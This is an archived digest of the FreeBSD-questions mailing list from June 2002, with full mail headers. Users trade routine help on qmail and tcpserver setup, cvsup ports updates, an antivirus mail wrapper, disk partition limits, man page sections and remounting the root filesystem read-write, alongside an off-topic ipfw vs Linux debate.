Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I would have to agree with you. IPFW is the reason I learned FreeBSD. IPFW is fairly straight forward to me. However, I find that whenever someone says ANY system is no good in general or it crashes a lot (his reference to windows), the reason is normally their own inability to properly set it up. ----- Original Message ----- From: "Eric F Crist" To: "'Peter Leftwich'" ; "'Sanjay Bhattacharya'" Cc: "'FreeBSD LIST'" Sent: Tuesday, June 25, 2002 11:02 PM Subject: RE: Long live The Penguin!!!! [ipfw vs Linux] > I personally have not had any problems with ipfw. The amount of > features and capabilities is what makes it so complicated. Granted, it > could be a little easier to understand. It's worked for me and I, > personally, don't have a problem understanding the configuration and use > of it. It actually resembles the firewalling capabilities of Cisco's > IOS. > > Eric F Crist > President/Sys Admin > AdTech Integrated Systems, Inc > http://www.adtechintegrated.com > > > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG] On Behalf Of Peter Leftwich > Sent: Tuesday, June 25, 2002 10:19 PM > To: Sanjay Bhattacharya > Cc: FreeBSD LIST > Subject: Re: Long live The Penguin!!!! [ipfw vs Linux] > > On Wed, 26 Jun 2002, Sanjay Bhattacharya wrote: > > Please guys (the anti Penguin lobby), relax. I've been making my bread > and > > butter out of Linux for the last 3 years. And I am a Sun Certified > System > > Administrator. Still I've chosen my work field to be Linux. Why? > Because I > > am in love with the penguin. As for me I haven't found anything that's > > drastically wrong as it always happens with Winblows. On the contrary > there > > are revolutionary changes in 2.4 series kernels. One that has made my > life a > > lot easier is certianly netfilter/iptables. And as for the libc > problem, a > > little caution always saved my from big hassles. I am sort of a newbie > to > > FreeBSD. But one thing I dislike about it is ipfw. Its so complicated. > In > > contrast iptables in Linux is a pleasure to use. Apart from that > upgrading > > Linux kernel is an easy task. I always patch my kernel with the latest > > updates and then I compile it. It runs like a dream. And believe me, I > > haven't faced a single problem in the last three years. But one thing > I > > always avoid is rpm's. You might call me an old timer but I've my > faith on > > the sources. And the configure/make/make install/ has always given me > what I > > wanted. And to say nothing of the device recognition capabilities of > the > > Linux kernel. I thank my lucky stars again and again that I don't have > to > > bother about the HCL, thanks to Linux. So I think the Penguin is doing > a > > great job. And under no circumstances it is inferior to the daemon. I > want > > to conclude with the slogan ..."In Penguin I trust". > > rgds, > > Sanjay > > Sanjay, I'm not really aware of an "Anti-Penguin lobby" herein, nor am I > understanding of your motives in posting here. Is there a question in > all > that poorly-worded and grammatically-challenged drivel? :) j/k > > [And yeah! *sighs* ipfw is a bee-yatsch isn't it?! Kept me away from > it.] > > -- > Peter Leftwich > President & Founder > Video2Video Services > Box 13692, La Jolla, CA, 92039 USA > +1-413-403-9555 > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.372 / Virus Database: 207 - Release Date: 6/20/2002 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:33:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com (CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com [24.103.39.131]) by hub.freebsd.org (Postfix) with SMTP id 0879237B439 for ; Tue, 25 Jun 2002 21:32:37 -0700 (PDT) Received: (qmail 840 invoked by uid 1001); 26 Jun 2002 04:33:04 -0000 Date: Wed, 26 Jun 2002 00:33:04 -0400 From: Miroslav Pendev To: Taylor Dondich Cc: questions@freebsd.org Subject: Re: How come SMTP isn't working on my QMAIL installation? Message-ID: <20020626043304.GC252@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> References: <000c01c21cba$708563c0$cde85940@penguin> <20020626033159.GB252@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <001b01c21cc4$d5768fc0$cde85940@penguin> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <001b01c21cc4$d5768fc0$cde85940@penguin> X-Divine-Shadow-Zone: Beware of Lexxx! X-Operating-System: FreeBSD 4.6 User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Tue, Jun 25, 2002 at 08:51:58PM -0700, Taylor Dondich wrote: > > Did you finish the qmail installation with 'make disable-sendmail' and > > 'make enable-qmail'? > > Yes. > > > > > You must edit your configuration files into /var/qmail/control/ too! > > This has been done. > > > > > The installation will install qmail.sh file into /usr/local/etc/rc.d > > to start qmail you need to reboot, or just type ./qmail.sh start into the > > above directory. > > Done as well. > > > > > Can you type 'netstat -a | grep LISTEN' as root and see if you have > > something to listen as smtp? > > Now here's the interesting thing. Nothing is listening on it. The standard > qmail daemons are running in the background but nothing is listening on the > smtp port. > > Taylor Dondich You can see qmail-send process running with 'top', right? Do you have inetd runing? Check for 'inetd_enable="YES"' (and sendmail_enable="NO") into /etc/rc.conf! If the inetd is running, try to uncomment the line for smtp into /etc/inetd.conf. The line begins with 'smtp stream tcp nowait qmaild ...' Hope that will help... :-) --Miro To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:36:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.samuelstn.dhs.org (h24-64-81-248.cg.shawcable.net [24.64.81.248]) by hub.freebsd.org (Postfix) with SMTP id C488937B400 for ; Tue, 25 Jun 2002 21:36:18 -0700 (PDT) Received: (qmail 34035 invoked from network); 26 Jun 2002 04:36:17 -0000 Received: from intelex (192.168.1.5) by homeserver with SMTP; 26 Jun 2002 04:36:17 -0000 Message-ID: <029101c21ccb$02f589a0$0501a8c0@intelex> From: "Samuel Chow" To: "Taylor Dondich" , "Miroslav Pendev" Cc: References: <000c01c21cba$708563c0$cde85940@penguin> <20020626033159.GB252@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <001b01c21cc4$d5768fc0$cde85940@penguin> Subject: Re: How come SMTP isn't working on my QMAIL installation? Date: Tue, 25 Jun 2002 22:35:51 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi there, > Now here's the interesting thing. Nothing is listening on it. > The standard qmail daemons are running in the background but > nothing is listening on the smtp port. Do you have something like the following in /var/qmail/rc, or any other file you start qmail with? /usr/local/bin/tcpserver -v -H -lhostname -u 82 -g 81 \ -x /var/qmail/tcp.smtp.cdb 0 smtp /var/qmail/bin/qmail-smtpd & This starts tcpserver on smtp port. When a connection is accepted, it is passed on to qmail-smtpd. Please check the options for tcpserver, you probably don't want some of the options I have. --- Samuel Chow cyschow@shaw.ca Segmentation Fault (core dumped) This message is displayed using recycled electrons. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:44: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from rutger.owt.com (rutger.owt.com [204.118.6.16]) by hub.freebsd.org (Postfix) with ESMTP id 5743B37B401 for ; Tue, 25 Jun 2002 21:43:57 -0700 (PDT) Received: from owt.com (owt-207-41-94-232.owt.com [207.41.94.232]) by rutger.owt.com (8.9.3/8.9.3) with ESMTP id VAA30630; Tue, 25 Jun 2002 21:43:54 -0700 Message-ID: <3D194689.6050806@owt.com> Date: Tue, 25 Jun 2002 21:43:53 -0700 From: Kent Stewart User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us, es-mx MIME-Version: 1.0 To: Darren Pilgrim Cc: Aaron Burke , FreeBSD-Questions Subject: Re: Updating my ports tree? References: <3D19267F.8A2FCFE5@pantherdragon.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Darren Pilgrim wrote: > Aaron Burke wrote: > >>>-----Original Message----- >>>From: owner-freebsd-questions@FreeBSD.ORG >>>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Darren Pilgrim >>>Sent: Tuesday, June 25, 2002 06:16 PM >>>To: freebsd-questions@FreeBSD.ORG >>>Subject: Updating my ports tree? >>> >>> >>>I have a 4.5-R machine for which I'd like to update my ports tree. >>>I really just want the current openssh-portable port, but I figure I >>>might as well update the whole tree while I'm at it. Do I need to >>>fetch the tree for -stable, or do I just fetch it from the default in >>>the example supfile (which is .)? >>> >>They are not the same supfiles. Also the ports are constantly changing. >>I use the supfile from /usr/share/examples/cvsup/ports-supfile. The only >>thing that needs changing is the cvsup server. I also copied this file >>to /root. Just make the changes and run >>"cvsup -g -L 2 /root/ports-supfile" to get the new ports installed. >> > > Thanks for your reply, but I managed to get it to work before anyone > replied. Right now I'm installing portupgrade and will be upgrading > all the installed ports. Don't forget to update your /usr/ports/INDEX.* files after you cvsup ports-all. Since you have installed portupgrade, you can use portsdb -uU to update them. Otherwise, you are using old dependancies. Kent > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > . > > -- Kent Stewart Richland, WA http://users.owt.com/kstewart/index.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 21:55:57 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.samuelstn.dhs.org (h24-64-81-248.cg.shawcable.net [24.64.81.248]) by hub.freebsd.org (Postfix) with SMTP id 16BC737B406 for ; Tue, 25 Jun 2002 21:55:53 -0700 (PDT) Received: (qmail 34122 invoked from network); 26 Jun 2002 04:55:52 -0000 Received: from intelex (192.168.1.5) by homeserver with SMTP; 26 Jun 2002 04:55:52 -0000 Message-ID: <000301c21ccd$bf77d450$0501a8c0@intelex> From: "Samuel Chow" To: "Miroslav Pendev" , "Taylor Dondich" Cc: References: <000c01c21cba$708563c0$cde85940@penguin> <20020626033159.GB252@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <001b01c21cc4$d5768fc0$cde85940@penguin> <20020626043304.GC252@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> Subject: Re: How come SMTP isn't working on my QMAIL installation? Date: Tue, 25 Jun 2002 22:55:25 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi there, > Do you have inetd runing? > Check for 'inetd_enable="YES"' (and sendmail_enable="NO") > into /etc/rc.conf! > > If the inetd is running, try to uncomment the line > for smtp into /etc/inetd.conf. > The line begins with 'smtp stream tcp nowait qmaild ...' I assume you also read the note above the smtp entry in /etc/inetd.conf. # Example entry for the optional qmail MTA # NOTE: This is no longer the correct way to handle incoming SMTP # connections for qmail. Use tcpserver # (http://cr.yp.to/ucspi-tcp.html) instead. #smtp ... You can get tcpserver in the port tree /usr/ports/sysutils/ucspi-tcp. --- Samuel Chow cyschow@shaw.ca Segmentation Fault (core dumped) This message is displayed using recycled electrons. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 22:10:50 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lexx.zssm.zp.ua (lexx.zssm.zp.ua [212.8.32.8]) by hub.freebsd.org (Postfix) with ESMTP id 3CAF237B40A for ; Tue, 25 Jun 2002 22:10:29 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by lexx.zssm.zp.ua (8.9.2/8.9.2) with ESMTP id IAA29968; Wed, 26 Jun 2002 08:02:54 +0300 (EET DST) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id A13FD38302; Wed, 26 Jun 2002 08:08:50 +0300 (EEST) Date: Wed, 26 Jun 2002 08:08:50 +0300 (EEST) From: Alexander V Zubchenko To: David Syphers Cc: FreeBSD Questions Subject: Re: Sysinstall replacement In-Reply-To: <200206251209.56093.dsyphers@uchicago.edu> Message-ID: <20020626080803.K9544-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! Great thanx for information. Full and complete answer:) Thx again, with respect to all FreeBSD community, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 On Tue, 25 Jun 2002, David Syphers wrote: > On Tuesday 25 June 2002 04:18 am, Alexander V Zubchenko wrote: > > Greetings, All! > > > > I've read in manpage sysinstall(8): "This product is currently at the > > end of it's life cycle and will eventually be replaced". For what kind > > of thing it will, and when? Just pure interest. If somebody know. > > The replacement is libh. See http://www.freebsd.org/projects/libh.html. > > -David > > -- > Everyone who believes in telekinesis, raise my hand... > > Astronomy and Astrophysics Center > The University of Chicago > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 22:12:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www.opti-telecom.ru (www.opti-telecom.ru [80.82.166.38]) by hub.freebsd.org (Postfix) with SMTP id DCF8237B403 for ; Tue, 25 Jun 2002 22:12:42 -0700 (PDT) Received: (qmail 26176 invoked from network); 26 Jun 2002 05:09:31 -0000 Received: from gwh-ao53a.opti.ru (HELO brian) (80.82.166.55) by www.opti-telecom.ru with SMTP; 26 Jun 2002 05:09:31 -0000 Date: Wed, 26 Jun 2002 10:12:35 +0500 From: =?Windows-1251?B?wO3k8OXpIMvl6erg7eQ=?= X-Mailer: The Bat! (v1.60n) Reply-To: =?Windows-1251?B?wO3k8OXpIMvl6erg7eQ=?= Organization: =?Windows-1251?B?zs7OICLO7/LoINLl6+Xq7uwi?= X-Priority: 3 (Normal) Message-ID: <177753540828.20020626101235@opti-telecom.ru> To: "Miroslav Pendev" Cc: freebsd-questions Subject: Re[4]: The virus spreading around In-Reply-To: <004801c21c58$873bfaf0$c801a8c0@vsivyoung> References: <20020622070316.GA15644@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <16612008897.20020622121858@dds.nl> <4.2.0.58.20020622135159.0098dd90@pop.netzero.net> <20020622194231.GA19270@CPE0004761ac738-CM00109515bc65.cpe.net.cable.rogers.com> <108691970140.20020625170624@opti-telecom.ru> <004801c21c58$873bfaf0$c801a8c0@vsivyoung> MIME-Version: 1.0 Content-Type: text/plain; charset=Windows-1251 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello Miroslav, Tuesday, June 25, 2002, 7:56:41 PM, you wrote: MP> Try to put into ~user_homedir/.qmail file one more row with your MP> delivery metod. For Maildir delivery, for example your .qmail must MP> looks like this: MP> |/usr/local/bin/odeiavir -ns MP> /home/your_user_name/Maildir/ MP> Hope that helps! That DOES help me !!! I'm really happy now ;) Thanks alot ! Miro, you are the best. P.S. I've sent the same question to jcastro@vialink.com.br (the creator of the oddeiavir wrapper) about two weeks ago and still have no answer. -- Best regards, Andrew mailto:brian@opti-telecom.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 22:15:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from email.telnor.net (email.telnor.net [200.23.249.11]) by hub.freebsd.org (Postfix) with ESMTP id 5126037B403; Tue, 25 Jun 2002 22:15:26 -0700 (PDT) Received: from kris.com (ens-TNTbahia2-81.telnor.net [200.56.111.81]) by email.telnor.net (Sun Internet Mail Server sims.4.0.2001.07.26.11.50.p9) with ESMTP id <0GYA002BCRHBVN@email.telnor.net>; Tue, 25 Jun 2002 22:05:43 -0700 (PDT) Date: Tue, 25 Jun 2002 22:21:30 -0700 From: jehova Subject: Re: Long live The Penguin!!!![Out of Topic go to freebsd-newbies] In-reply-to: <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> To: Sanjay Bhattacharya Cc: freebsd-newbies@FreeBSD.ORG, FreeBSD-Questions Message-id: <200206252221.30406.tornadox@telnor.net> MIME-version: 1.0 X-Mailer: KMail [version 1.4] Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7BIT References: <20020625120402.A7861@cygnus.wks.Gallup.cia-g.com> <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG opinions discusions and 'personal feelings'about OS cause FLAMES, on a technical list. newbies list is fine. read for what is freebsd-newbies. read this: http://www.lemis.com/questions.html (it contains this) [...] If the question is of a general nature, first check whether this isn't a Frequently Asked Question (FAQ). There's a list of these questions at http://www.freebsd.org/FAQ/FAQ.html, and also on your own system (once you've installed it) at /usr/share/doc/FAQ/FAQ.html. Check there, and if you don't find an answer, ask FreeBSD-questions. Examples might be questions about installing FreeBSD or the use of a particular UNIX utility. [...] ------>If you're new to FreeBSD, and the message is about your own ------>relationship to FreeBSD, send the message to Freebsd-newbies [...] On Tuesday 25 June 2002 19:57, Sanjay Bhattacharya wrote: > Please guys (the anti Penguin lobby), relax. I've been making my > bread and butter out of Linux for the last 3 years. And I am a > Sun Certified System Administrator. Still I've chosen my work > field to be Linux. Why? Because I am in love with the penguin. > As for me I haven't found anything that's drastically wrong as > it always happens with Winblows. On the contrary there are > revolutionary changes in 2.4 series kernels. One that has made > my life a lot easier is certianly netfilter/iptables. And as for > the libc problem, a little caution always saved my from big > hassles. I am sort of a newbie to FreeBSD. But one thing I > dislike about it is ipfw. Its so complicated. In contrast > iptables in Linux is a pleasure to use. Apart from that > upgrading Linux kernel is an easy task. I always patch my kernel > with the latest updates and then I compile it. It runs like a > dream. And believe me, I haven't faced a single problem in the > last three years. But one thing I always avoid is rpm's. You > might call me an old timer but I've my faith on the sources. And > the configure/make/make install/ has always given me what I > wanted. And to say nothing of the device recognition > capabilities of the Linux kernel. I thank my lucky stars again > and again that I don't have to bother about the HCL, thanks to > Linux. So I think the Penguin is doing a great job. And under no > circumstances it is inferior to the daemon. I want to conclude > with the slogan ..."In Penguin I trust". > > rgds, > Sanjay > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message -- _ __ ___ ____ ___ ___ ___ __ Jehova _ __ ___ | _ ) __| \/ \ tornadox@telnor.net _ __ | _ \._ \ |) | | FreeBSD!!! _ |___/___/___/ \/ () To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 22:48: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp3.cyquator.com (smtp3.cyquator.com [202.46.193.25]) by hub.freebsd.org (Postfix) with SMTP id 10B4E37B401 for ; Tue, 25 Jun 2002 22:48:03 -0700 (PDT) Received: (qmail 10842 invoked from network); 26 Jun 2002 05:47:06 -0000 Received: from unknown (HELO metasyssoftware.com) ([202.68.140.84]) (envelope-sender ) by smtp3.cyquator.com (qmail-ldap-1.03) with SMTP for ; 26 Jun 2002 05:47:06 -0000 Received: from sutlej [192.168.2.25] by metasyssoftware.com (FTGate 2, 2, 2, 1); Wed, 26 Jun 2002 12:03:04 +0530 Message-ID: <000c01c21c53$0e0447a0$1902a8c0@sutlej> From: "Prasad Iyer" To: Subject: about freebsd current version Date: Tue, 25 Jun 2002 19:47:35 +0530 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0009_01C21C81.27701150" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2314.1300 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0009_01C21C81.27701150 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sir, I have recently downloaded freebsd Current Version. I am new to Freebsd. I am installing Freebsd from DOS media. During the installation it is not able to find bin directory I search your FTP site for this directory but wasn't able to find it. Can you please help me with this. Your early reply would be highly appreciated. As a programmer I am very restless. Thanks=20 regards Prasad Iyer (india) ------=_NextPart_000_0009_01C21C81.27701150 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Sir,
I have recently downloaded freebsd = Current=20 Version. I am new to
Freebsd. I am installing Freebsd from DOS media. = During=20 the
installation it is not able to find bin directory I search your=20 FTP
site for this directory but wasn't able to find it. Can you=20 please
help me with this.
Your early reply would be highly = appreciated. As=20 a programmer I am
very restless.
Thanks
regards
Prasad=20 Iyer
(india)
------=_NextPart_000_0009_01C21C81.27701150-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 22:51:38 2002 Delivered-To: freebsd-questions@freebsd.org Received: from desert.zssm.zp.ua (desert.zssm.zp.ua [212.8.32.5]) by hub.freebsd.org (Postfix) with ESMTP id 8AB5E37B40E for ; Tue, 25 Jun 2002 22:51:07 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by desert.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5Q5nMc25381 for ; Wed, 26 Jun 2002 08:49:23 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 80BCE38302 for ; Wed, 26 Jun 2002 08:55:18 +0300 (EEST) Date: Wed, 26 Jun 2002 08:55:18 +0300 (EEST) From: Alexander V Zubchenko To: FreeBSD Questions Subject: Re: Install - Partitions In-Reply-To: <000b01c21c7b$e0b35740$3800a8c0@DAVE> Message-ID: <20020626085300.F9544-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! On Tue, 25 Jun 2002, Dave Raven wrote: > Hello all, > Just a quick question that I cant seem to find an answer to. > I have a 4.5 install ISO, and I boot up of it and get ready > to install. However, when I go to partition the drive, > I am unable to create more than 4 slices, as after the 4th > slice (ad0s4) they start to be labelled as X (instead of say > ad0s5). Then when I goto install, I get an error about > /dev/X not existing.... PC HDD architecture is not supposed to support more than 4 primary partitions (regarding to shown devicenames, this is primary partitions). And why You need this. FreeBSD need only one partition in DOS partition table. Within You can create so many 'slices' (in fact, FreeBSD partitions), as You want. > > > Its clearly not assigning labels to the later patitions, but why > is this? Am I missing something or can it simply not be done? > > Thanks, > Dave Raven. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > Hope this help, with respect, Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23: 0:41 2002 Delivered-To: freebsd-questions@freebsd.org Received: from lexx.zssm.zp.ua (lexx.zssm.zp.ua [212.8.32.8]) by hub.freebsd.org (Postfix) with ESMTP id 8C0BF37B403 for ; Tue, 25 Jun 2002 23:00:28 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by lexx.zssm.zp.ua (8.9.2/8.9.2) with ESMTP id IAA03563 for ; Wed, 26 Jun 2002 08:55:14 +0300 (EET DST) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id 925B838302 for ; Wed, 26 Jun 2002 09:01:11 +0300 (EEST) Date: Wed, 26 Jun 2002 09:01:11 +0300 (EEST) From: Alexander V Zubchenko To: FreeBSD Questions Subject: Re: Problems installing XFree86 In-Reply-To: Message-ID: <20020626085655.W9544-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! On Tue, 25 Jun 2002, Victor Wang wrote: > Also, why do people always put a number in brackets after every command? For example, ls(1). BTW, yes, I am a newbie. Sorry, just one more comment. In fact, number in brackets is number of section for 'man' command (from 'manual'). Good example is, when you are talking about passwd command (to change password), you are talking about passwd(1). But when you are talking about file /etc/passwd (where information about users, and not passwords as for today:):) is stored), you are talking about passwd(5). To check about some command use 'man '. Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 phone/fax: +380 612 64-19-72 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 23: 1: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from matrix.zssm.zp.ua (matrix.zssm.zp.ua [212.8.32.10]) by hub.freebsd.org (Postfix) with ESMTP id DF92A37B403 for ; Tue, 25 Jun 2002 23:00:56 -0700 (PDT) Received: from server.hermes-comp.zp.ua (germes-comp.zssm.zp.ua [212.8.32.132] (may be forged)) by matrix.zssm.zp.ua (8.11.3/8.11.3) with ESMTP id g5Q5ulo81652; Wed, 26 Jun 2002 08:56:53 +0300 (EEST) (envelope-from stalker@hermes-comp.zp.ua) Received: from localhost (localhost [127.0.0.1]) by server.hermes-comp.zp.ua (Postfix) with ESMTP id B607438302; Wed, 26 Jun 2002 09:04:04 +0300 (EEST) Date: Wed, 26 Jun 2002 09:04:04 +0300 (EEST) From: Alexander V Zubchenko To: Lee Cc: Subject: Re: Can only boot into single-user mode - Please Help Urgent In-Reply-To: <003501c21c9e$310ad840$6400a8c0@Administrator> Message-ID: <20020626090133.Y9544-100000@server.hermes-comp.zp.ua> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Greetings! On Wed, 26 Jun 2002, Lee wrote: > Hello, > > Please help urgently. > > I was just editing the rc.conf file to add some new ethernet card aliases but I missed out the file ' " ', now the system will only allow me to boot into single-user mode. > > I know how to fix the problem, but as the / filesystem is mounted read-only I cannot edit the rc.conf file. > > I have tried using the Install CD's fixit option but none of the options work. > > Can anyone tell me. > a) How to by pass the rc.conf file and just the rc.conf.defaults > b) How to unmount the filesystem, so that I can remount it with right access. You don't need to do this, as was mentioned above. But i find this command more comfortable: mount -u -w / -u for change options on currently mounted partition and -w for set it to read/write. And of course, don't forget to run fsck -p before. > > thanks for any help any one can offer. > > I would also like to make a couple of comments / questions: > > Is it appropriate to have the / file system mounted read-only, as this prevents as editing of the system files which are most likely to cause boot problems? > > Also, IMHO, the Emergency Holographic shell is next to useless with this particular problem as none of the basic commands I tried work (e.g. mount, umount, ls, etc). > > Regards > > Lee > Alexander V Zubchenko, E-Mail: stalker@hermes-comp.zp.ua System Administrator, WWW: http://www.hermes-comp.zp.ua/ Hermes-comp, Ukraine, Zaporizhzhya, Geroev Stalingrada 50 